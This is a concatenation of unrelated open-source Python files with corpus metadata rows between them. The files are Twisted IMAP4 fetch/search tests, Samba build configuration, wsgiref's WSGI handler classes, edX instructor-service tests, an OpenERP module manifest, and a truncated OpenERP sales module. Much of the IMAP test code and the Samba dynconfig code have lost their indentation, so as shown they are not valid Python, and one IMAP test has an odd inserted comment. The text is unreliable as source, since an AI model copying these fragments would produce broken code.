self.server_received_query = query
self.server_received_uid = uid
return self.expected
def _searchWork(self, uid):
def search():
return self.client.search(self.query, uid=uid)
def result(R):
self.result = R
self.connected.addCallback(strip(search)
).addCallback(result
).addCallback(self._cbStopClient
).addErrback(self._ebGeneral)
loopback.loopbackTCP(self.server, self.client)
        # Ensure no short-circuiting weirdness is going on
self.failIf(self.result is self.expected)
self.assertEquals(self.result, self.expected)
self.assertEquals(self.uid, self.server_received_uid)
self.assertEquals(
imap4.parseNestedParens(self.query),
self.server_received_query
)
def testSearch(self):
self.query = imap4.Or(
imap4.Query(header=('subject', 'substring')),
imap4.Query(larger=1024, smaller=4096),
)
self.expected = [1, 4, 5, 7]
self.uid = 0
self._searchWork(0)
def testUIDSearch(self):
self.query = imap4.Or(
imap4.Query(header=('subject', 'substring')),
imap4.Query(larger=1024, smaller=4096),
)
self.uid = 1
self.expected = [1, 2, 3]
self._searchWork(1)
def fetch(self, messages, parts, uid):
self.server_received_uid = uid
self.server_received_parts = parts
self.server_received_messages = str(messages)
return self.expected
def _fetchWork(self, fetch):
def result(R):
self.result = R
self.connected.addCallback(strip(fetch)
).addCallback(result
).addCallback(self._cbStopClient
).addErrback(self._ebGeneral)
loopback.loopbackTCP(self.server, self.client)
        # Ensure no short-circuiting weirdness is going on
self.failIf(self.result is self.expected)
self.parts and self.parts.sort()
self.server_received_parts and self.server_received_parts.sort()
self.assertEquals(self.result, self.expected)
self.assertEquals(self.uid, self.server_received_uid)
self.assertEquals(self.parts, self.server_received_parts)
self.assertEquals(self.messages, self.server_received_messages)
def testFetchUID(self):
def fetch():
return self.client.fetchUID(self.messages)
self.expected = {
1: {'UID': '10'},
2: {'UID': '20'},
3: {'UID': '21'},
4: {'UID': '101'},
101: {'UID': '202'}
}
self.messages = '1:56,60,103:109'
self.parts = ['UID']
self.uid = 0
self._fetchWork(fetch)
def testFetchFlags(self, uid=0):
def fetch():
return self.client.fetchFlags(self.messages, uid=uid)
self.expected = {
32: {'FLAGS': ['\\RECENT']},
64: {'FLAGS': ['\\DELETED', '\\UNSEEN']},
128: {'FLAGS': []}
}
self.messages = '5:102,202:*'
self.parts = ['FLAGS']
self.uid = uid
self._fetchWork(fetch)
def testFetchFlagsUID(self):
self.testFetchFlags(1)
def testFetchInternalDate(self, uid=0):
def fetch():
return self.client.fetchInternalDate(self.messages, uid=uid)
self.expected = {
10: {'INTERNALDATE': '20-Oct-1981 03:25:19 -0500'},
20: {'INTERNALDATE': '15-Feb-1985 01:30:05 +0900'},
21: {'INTERNALDATE': '01-Jun-1992 13:51:48 -0100'},
}
self.messages = '1,69,72,103'
self.parts = ['INTERNALDATE']
self.uid = uid
self._fetchWork(fetch)
def testFetchInternalDateUID(self):
self.testFetchInternalDate(1)
def testFetchEnvelope(self, uid=0):
def fetch():
return self.client.fetchEnvelope(self.messages, uid=uid)
self.expected = {
102: {'ENVELOPE': 'some data'},
}
self.messages = '72:102,103'
self.parts = ['ENVELOPE']
self.uid = uid
self._fetchWork(fetch)
def testFetchEnvelopeUID(self):
self.testFetchEnvelope(1)
def testFetchBodyStructure(self, uid=0):
def fetch():
return self.client.fetchBodyStructure(self.messages, uid=uid)
self.expected = {
103: {'BODYSTRUCTURE': 'lots of gross information'},
}
self.messages = '1:*'
self.parts = ['BODYSTRUCTURE']
self.uid = uid
self._fetchWork(fetch)
def testFetchBodyStructureUID(self):
self.testFetchBodyStructure(1)
def testFetchSimplifiedBody(self, uid=0):
def fetch():
return self.client.fetchSimplifiedBody(self.messages, uid=uid)
self.expected = {
2: {'BODY': 'XXX fill this in bucko'},
}
self.messages = '2,5,10'
self.parts = ['BODY']
self.uid = uid
self._fetchWork(fetch)
def testFetchSimplifiedBodyUID(self):
self.testFetchSimplifiedBody(1)
def testFetchMessage(self, uid=0):
def fetch():
return self.client.fetchMessage(self.messages, uid=uid)
self.expected = {
29281: {'BODY': 'XXX fill this in bucko'},
}
self.messages = '19884,1,23872,666:777'
self.parts = ['RFC822']
self.uid = uid
self._fetchWork(fetch)
def testFetchMessageUID(self):
self.testFetchMessage(1)
def testFetchHeaders(self, uid=0):
def fetch():
return self.client.fetchHeaders(self.messages, uid=uid)
self.expected = {
19: {'RFC822HEADER': 'XXX put some headers here'},
}
self.messages = '2:3,4:5,6:*'
self.parts = ['RFC822HEADER']
self.uid = uid
self._fetchWork(fetch)
def testFetchHeadersUID(self):
self.testFetchHeaders(1)
def testFetchBody(self, uid=0):
def fetch():
return self.client.fetchBody(self.messages, uid=uid)
self.expected = {
1: {'RFC822TEXT': 'XXX put some body here'},
}
self.messages = '1,2,3,4,5,6,7'
self.parts = ['RFC822TEXT']
self.uid = uid
self._fetchWork(fetch)
def testFetchBodyUID(self):
self.testFetchBody(1)
def testFetchSize(self, uid=0):
def fetch():
return self.client.fetchSize(self.messages, uid=uid)
self.expected = {
1: {'SIZE': '12345'},
}
        self.messages = '1:100,150:*'  # added: fetch() above needs a message set to send
        self.parts = ['RFC822SIZE']
self.uid = uid
self._fetchWork(fetch)
def testFetchSizeUID(self):
self.testFetchSize(1)
def testFetchFull(self, uid=0):
def fetch():
return self.client.fetchFull(self.messages, uid=uid)
self.expected = {
1: {
'FLAGS': 'XXX put some flags here',
'INTERNALDATE': 'Sun, 25 Jul 2010 06:20:30 -0400 (EDT)',
'RFC822SIZE': '12345',
'ENVELOPE': 'XXX envelope',
'BODY': 'XXX body',
},
3: {
'FLAGS': 'XXX put some flags here',
'INTERNALDATE': 'Mon, 14 Apr 2003 19:43:44 -0400',
'RFC822SIZE': '12345',
'ENVELOPE': 'XXX envelope',
'BODY': 'XXX body',
}
}
self.messages = '1,3'
self.parts = ['FLAGS', 'INTERNALDATE', 'RFC822SIZE', 'ENVELOPE', 'BODY']
self.uid = uid
self._fetchWork(fetch)
def testFetchFullUID(self):
self.testFetchFull(1)
def testFetchAll(self, uid=0):
def fetch():
return self.client.fetchAll(self.messages, uid=uid)
self.expected = {
1: {
'ENVELOPE': 'the envelope looks like this',
'RFC822SIZE': '1023',
'INTERNALDATE': 'Tuesday',
'FLAGS': [],
}, 2: {
'ENVELOPE': 'another envelope',
'RFC822SIZE': '3201',
'INTERNALDATE': 'Friday',
'FLAGS': ['\\SEEN', '\\DELETED'],
}
}
self.messages = '1,2:3'
self.parts = ['ENVELOPE', 'RFC822SIZE', 'INTERNALDATE', 'FLAGS']
self.uid = uid
self._fetchWork(fetch)
def testFetchAllUID(self):
        self.testFetchAll(1)
def testFetchFast(self, uid=0):
def fetch():
return self.client.fetchFast(self.messages, uid=uid)
self.expected = {
1: {
'FLAGS': [],
'INTERNALDATE': '19 Mar 2003 19:22:21 -0500',
'RFC822SIZE': '12345',
},
}
self.messages = '1'
self.parts = ['FLAGS', 'INTERNALDATE', 'RFC822SIZE']
self.uid = uid
self._fetchWork(fetch)
def testFetchFastUID(self):
self.testFetchFast(1)
| gpl-2.0 | 2,379,290,569,724,047,000 | 33.020774 | 115 | 0.554999 | false |
artemh/asuswrt-merlin | release/src/router/samba36/source3/build/dynconfig.py | 19 | 4157 | import string, Utils
# list of directory options to offer in configure
dir_options = {
'with-cachedir' : [ '${PREFIX}/var/locks', 'where to put temporary cache files' ],
'with-codepagedir' : [ '${PREFIX}/lib/samba', 'where to put codepages' ],
'with-configdir' : [ '${PREFIX}/etc/samba', 'Where to put configuration files' ],
'with-lockdir' : [ '${PREFIX}/var/locks', 'where to put lock files' ],
'with-logfilebase' : [ '${PREFIX}/var/log/samba', 'Where to put log files' ],
'with-ncalrpcdir' : [ '${PREFIX}/var/ncalrpc', 'where to put ncalrpc sockets' ],
'with-nmbdsocketdir' : [ '${PREFIX}/var/locks/.nmbd', 'Where to put the nmbd socket directory' ],
'with-ntp-signd-socket-dir' : [ '${PREFIX}/var/run/ntp_signd', 'NTP signed directory'],
'with-pammodulesdir' : [ '', 'Which directory to use for PAM modules' ],
'with-piddir' : [ '${PREFIX}/var/locks', 'where to put pid files' ],
'with-privatedir' : [ '${PREFIX}/private', 'where to put smbpasswd' ],
'with-selftest-prefix' : [ '', 'The prefix where make test will be run' ],
'with-selftest-shrdir' : [ '', 'The share directory that make test will be run against' ],
'with-statedir' : [ '${PREFIX}/var/locks', 'where to put persistent state files' ],
'with-swatdir' : [ '${PREFIX}/swat', 'Where to put SWAT files' ],
'with-winbindd-privileged-socket-dir' : [ '${PREFIX}/var/lib/winbindd_privileged', 'winbind privileged socket directory'],
'with-winbindd-socket-dir' : [ '${PREFIX}/var/lib/winbindd', 'winbind socket directory' ],
}
# list of cflags to use for dynconfig.c
dyn_cflags = {
'BINDIR' : '${BINDIR}',
'CACHEDIR' : '${CACHEDIR}',
'CODEPAGEDIR' : '${CODEPAGEDIR}',
'CONFIGDIR' : '${SYSCONFDIR}',
'CONFIGFILE' : '${SYSCONFDIR}/smb.conf',
'DATADIR' : '${DATADIR}',
'LIBDIR' : '${LIBDIR}',
'LOCALEDIR' : '${LOCALEDIR}',
'LMHOSTSFILE' : '${SYSCONFDIR}/lmhosts',
'LOCKDIR' : '${LOCALSTATEDIR}/locks',
'LOGFILEBASE' : '${LOCALSTATEDIR}',
'MODULESDIR' : '${PREFIX}/modules',
'NCALRPCDIR' : '${LOCALSTATEDIR}/ncalrpc',
'NMBDSOCKETDIR' : '${LOCKDIR}/.nmbd',
'NTP_SIGND_SOCKET_DIR' : '${NTP_SIGND_SOCKET_DIR}',
'PIDDIR' : '${LOCALSTATEDIR}/run',
'PKGCONFIGDIR' : '${LIBDIR}/pkgconfigdir',
'PRIVATE_DIR' : '${PRIVATEDIR}',
'SBINDIR' : '${SBINDIR}',
'SETUPDIR' : '${DATADIR}/setup',
'SMB_PASSWD_FILE' : '${PRIVATEDIR}/smbpasswd',
'STATEDIR' : '${LOCALSTATEDIR}',
'SWATDIR' : '${PREFIX}/swat',
'WINBINDD_PRIVILEGED_SOCKET_DIR' : '${WINBINDD_PRIVILEGED_SOCKET_DIR}',
'WINBINDD_SOCKET_DIR' : '${WINBINDD_SOCKET_DIR}',
}
def get_varname(v):
'''work out a variable name from a configure option name'''
if v.startswith('with-'):
v = v[5:]
v = v.upper()
v = string.replace(v, '-', '_')
return v
def dynconfig_cflags(bld):
'''work out the extra CFLAGS for dynconfig.c'''
cflags = []
for f in dyn_cflags.keys():
# substitute twice, as we could have substitutions containing variables
v = Utils.subst_vars(dyn_cflags[f], bld.env)
v = Utils.subst_vars(v, bld.env)
bld.ASSERT(v != '', "Empty dynconfig value for %s" % f)
bld.ASSERT(v.find('${') == -1, "Unsubstituted variable in %s : %s : %s" % (f, dyn_cflags[f], v))
cflags.append('-D%s="%s"' % (f, v))
return cflags
| gpl-2.0 | 9,128,600,073,514,185,000 | 56.736111 | 126 | 0.492422 | false |
sillydan1/WhatEverEngine | packages/IronPython.StdLib.2.7.5/content/Lib/wsgiref/handlers.py | 109 | 15932 | """Base classes for server/gateway implementations"""
from types import StringType
from util import FileWrapper, guess_scheme, is_hop_by_hop
from headers import Headers
import sys, os, time
__all__ = ['BaseHandler', 'SimpleHandler', 'BaseCGIHandler', 'CGIHandler']
try:
dict
except NameError:
def dict(items):
d = {}
for k,v in items:
d[k] = v
return d
# Uncomment for 2.2 compatibility.
#try:
# True
# False
#except NameError:
# True = not None
# False = not True
# Weekday and month names for HTTP date/time formatting; always English!
_weekdayname = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
_monthname = [None, # Dummy so we can use 1-based month numbers
"Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
def format_date_time(timestamp):
year, month, day, hh, mm, ss, wd, y, z = time.gmtime(timestamp)
return "%s, %02d %3s %4d %02d:%02d:%02d GMT" % (
_weekdayname[wd], day, _monthname[month], year, hh, mm, ss
)
class BaseHandler:
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = None # String name of server software, if any
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 Internal Server Error"
error_headers = [('Content-Type','text/plain')]
error_body = "A server error occurred. Please contact the administrator."
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will
want to redefine this method, such that it sets up callbacks
in the event loop to iterate over the data, and to call
'self.close()' once the response is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError,AttributeError,NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert type(status) is StringType,"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert type(name) is StringType,"Header names must be strings"
assert type(val) is StringType,"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % format_date_time(time.time())
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert type(data) is StringType,"write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
transmission of the file.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
# Only zero Content-Length if not set by the application (so
# that HEAD requests can be satisfied properly, see #3839)
self.headers.setdefault('Content-Length', "0")
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
"""Close the iterable (if needed) and reset all instance vars
Subclasses may want to also drop the client connection.
"""
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
"""WSGI mini-app to create error output
By default, this just uses the 'error_status', 'error_headers',
and 'error_body' attributes to generate an output page. It can
be overridden in a subclass to dynamically generate diagnostics,
choose an appropriate message for the user's preferred language, etc.
Note, however, that it's not recommended from a security perspective to
spit out diagnostics to any old user; ideally, you should have to do
something special to enable diagnostic output, which is why we don't
include any here!
"""
start_response(self.error_status,self.error_headers[:],sys.exc_info())
return [self.error_body]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
"""Override in subclass to buffer data for send to client
It's okay if this method actually transmits the data; BaseHandler
just separates write and flush operations for greater efficiency
when the underlying system actually has such a distinction.
"""
raise NotImplementedError
def _flush(self):
"""Override in subclass to force sending of recent '_write()' calls
It's okay if this method is a no-op (i.e., if '_write()' actually
sends the data.
"""
raise NotImplementedError
def get_stdin(self):
"""Override in subclass to return suitable 'wsgi.input'"""
raise NotImplementedError
def get_stderr(self):
"""Override in subclass to return suitable 'wsgi.errors'"""
raise NotImplementedError
def add_cgi_vars(self):
"""Override in subclass to insert CGI variables in 'self.environ'"""
raise NotImplementedError
class SimpleHandler(BaseHandler):
"""Handler that's just initialized with streams, environment, etc.
This handler subclass is intended for synchronous HTTP/1.0 origin servers,
and handles sending the entire response output, given the correct inputs.
Usage::
handler = SimpleHandler(
inp,out,err,env, multithread=False, multiprocess=True
)
handler.run(app)"""
def __init__(self,stdin,stdout,stderr,environ,
multithread=True, multiprocess=False
):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
class BaseCGIHandler(SimpleHandler):
"""CGI-like systems using input/output/error streams and environ mapping
Usage::
handler = BaseCGIHandler(inp,out,err,env)
handler.run(app)
This handler class is useful for gateway protocols like ReadyExec and
FastCGI, that have usable input/output/error streams and an environment
mapping. It's also the base class for CGIHandler, which just uses
sys.stdin, os.environ, and so on.
The constructor also takes keyword arguments 'multithread' and
'multiprocess' (defaulting to 'True' and 'False' respectively) to control
the configuration sent to the application. It sets 'origin_server' to
False (to enable CGI-like output), and assumes that 'wsgi.run_once' is
False.
"""
origin_server = False
class CGIHandler(BaseCGIHandler):
"""CGI-based invocation via sys.stdin/stdout/stderr and os.environ
Usage::
CGIHandler().run(app)
The difference between this class and BaseCGIHandler is that it always
uses 'wsgi.run_once' of 'True', 'wsgi.multithread' of 'False', and
'wsgi.multiprocess' of 'True'. It does not take any initialization
parameters, but always uses 'sys.stdin', 'os.environ', and friends.
If you need to override any of these parameters, use BaseCGIHandler
instead.
"""
wsgi_run_once = True
# Do not allow os.environ to leak between requests in Google App Engine
# and other multi-run CGI use cases. This is not easily testable.
# See http://bugs.python.org/issue7250
os_environ = {}
def __init__(self):
BaseCGIHandler.__init__(
self, sys.stdin, sys.stdout, sys.stderr, dict(os.environ.items()),
multithread=False, multiprocess=True
)
| apache-2.0 | 3,821,485,359,176,663,600 | 34.5625 | 79 | 0.62114 | false |
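The handler classes above are all driven through a single run(application) call; in the CGI case a complete program reduces to a few lines. A minimal sketch, assuming the module is importable from its standard-library location (wsgiref.handlers):

from wsgiref.handlers import CGIHandler

def app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return ['Hello from %s\n' % environ.get('PATH_INFO', '/')]

if __name__ == '__main__':
    # Reads the request from os.environ/sys.stdin and writes a CGI-style
    # response (a 'Status:' header instead of an HTTP status line) to stdout.
    CGIHandler().run(app)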
factorlibre/OCB | addons/note_pad/__openerp__.py | 312 | 1691 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Memos pad',
'version': '0.1',
'category': 'Tools',
'description': """
This module updates memos inside OpenERP to use an external pad
=================================================================
Use it to update your text memos in real time with the users that you invite.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/notes',
'summary': 'Sticky memos, Collaborative',
'depends': [
'mail',
'pad',
'note',
],
'data': [
'note_pad_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,940,159,063,534,811,600 | 33.510204 | 83 | 0.57126 | false |
caesar2164/edx-platform | lms/djangoapps/instructor/tests/test_services.py | 10 | 5649 | """
Tests for the InstructorService
"""
import json
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.models import StudentModule
from lms.djangoapps.instructor.access import allow_access
from lms.djangoapps.instructor.services import InstructorService
from lms.djangoapps.instructor.tests.test_tools import msk_from_problem_urlname
from nose.plugins.attrib import attr
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
import mock
@attr(shard=1)
class InstructorServiceTests(SharedModuleStoreTestCase):
"""
Tests for the InstructorService
"""
@classmethod
def setUpClass(cls):
super(InstructorServiceTests, cls).setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.other_problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-other_problem-urlname'
)
cls.problem_urlname = unicode(cls.problem_location)
cls.other_problem_urlname = unicode(cls.other_problem_location)
def setUp(self):
super(InstructorServiceTests, self).setUp()
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.service = InstructorService()
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 2}),
)
@mock.patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
"""
Test delete student state.
"""
# make sure the attempt is there
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
1
)
self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.problem_urlname,
requesting_user=self.student,
)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_bad_content_id(self):
"""
Negative test of trying to reset attempts with bad content_id
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_bad_user(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
'bad_student',
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_non_existing_attempt(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.other_problem_urlname,
requesting_user=self.student,
)
self.assertIsNone(result)
def test_is_user_staff(self):
"""
Test to assert that the user is staff or not
"""
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertFalse(result)
# allow staff access to the student
allow_access(self.course, self.student, 'staff')
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertTrue(result)
def test_report_suspicious_attempt(self):
"""
Test to verify that the create_zendesk_ticket() is called
"""
requester_name = "edx-proctoring"
email = "[email protected]"
subject = "Proctored Exam Review: {review_status}".format(review_status="Suspicious")
body = "A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} was " \
"reviewed as {review_status} by the proctored exam review provider."
body = body.format(
exam_name="test_exam", course_name=self.course.display_name, student_username="test_student",
review_status="Suspicious"
)
tags = ["proctoring"]
with mock.patch("lms.djangoapps.instructor.services.create_zendesk_ticket") as mock_create_zendesk_ticket:
self.service.send_support_notification(
course_id=unicode(self.course.id),
exam_name="test_exam",
student_username="test_student",
review_status="Suspicious"
)
mock_create_zendesk_ticket.assert_called_with(requester_name, email, subject, body, tags)
| agpl-3.0 | 5,714,664,984,746,693,000 | 33.236364 | 114 | 0.614976 | false |
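The zendesk test above follows the usual mock pattern: patch the collaborator, run the code under test, then assert on the recorded call. A generic, self-contained version of that pattern; send_alert is invented for this sketch and is not part of the edX code base:

import mock

def send_alert(recipient, send_mail):
    send_mail(recipient, "Proctored exam flagged")

def test_send_alert():
    fake_send = mock.Mock()
    send_alert("[email protected]", fake_send)
    fake_send.assert_called_with("[email protected]", "Proctored exam flagged")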
KousikaGanesh/purchaseandInventory | openerp/addons/sale_stock/sale_stock.py | 11 | 34326 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
from openerp import netsvc
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_shop(osv.osv):
_inherit = "sale.shop"
_columns = {
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse'),
}
sale_shop()
class sale_order(osv.osv):
_inherit = "sale.order"
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
default.update({
'shipped': False,
'picking_ids': [],
})
return super(sale_order, self).copy(cr, uid, id, default, context=context)
def shipping_policy_change(self, cr, uid, ids, policy, context=None):
if not policy:
return {}
inv_qty = 'order'
if policy == 'prepaid':
inv_qty = 'order'
elif policy == 'picking':
inv_qty = 'procurement'
return {'value': {'invoice_quantity': inv_qty}}
def write(self, cr, uid, ids, vals, context=None):
if vals.get('order_policy', False):
if vals['order_policy'] == 'prepaid':
vals.update({'invoice_quantity': 'order'})
elif vals['order_policy'] == 'picking':
vals.update({'invoice_quantity': 'procurement'})
return super(sale_order, self).write(cr, uid, ids, vals, context=context)
def create(self, cr, uid, vals, context=None):
if vals.get('order_policy', False):
if vals['order_policy'] == 'prepaid':
vals.update({'invoice_quantity': 'order'})
if vals['order_policy'] == 'picking':
vals.update({'invoice_quantity': 'procurement'})
order = super(sale_order, self).create(cr, uid, vals, context=context)
return order
# This is False
def _picked_rate(self, cr, uid, ids, name, arg, context=None):
if not ids:
return {}
res = {}
tmp = {}
for id in ids:
tmp[id] = {'picked': 0.0, 'total': 0.0}
cr.execute('''SELECT
p.sale_id as sale_order_id, sum(m.product_qty) as nbr, mp.state as procurement_state, m.state as move_state, p.type as picking_type
FROM
stock_move m
LEFT JOIN
stock_picking p on (p.id=m.picking_id)
LEFT JOIN
procurement_order mp on (mp.move_id=m.id)
WHERE
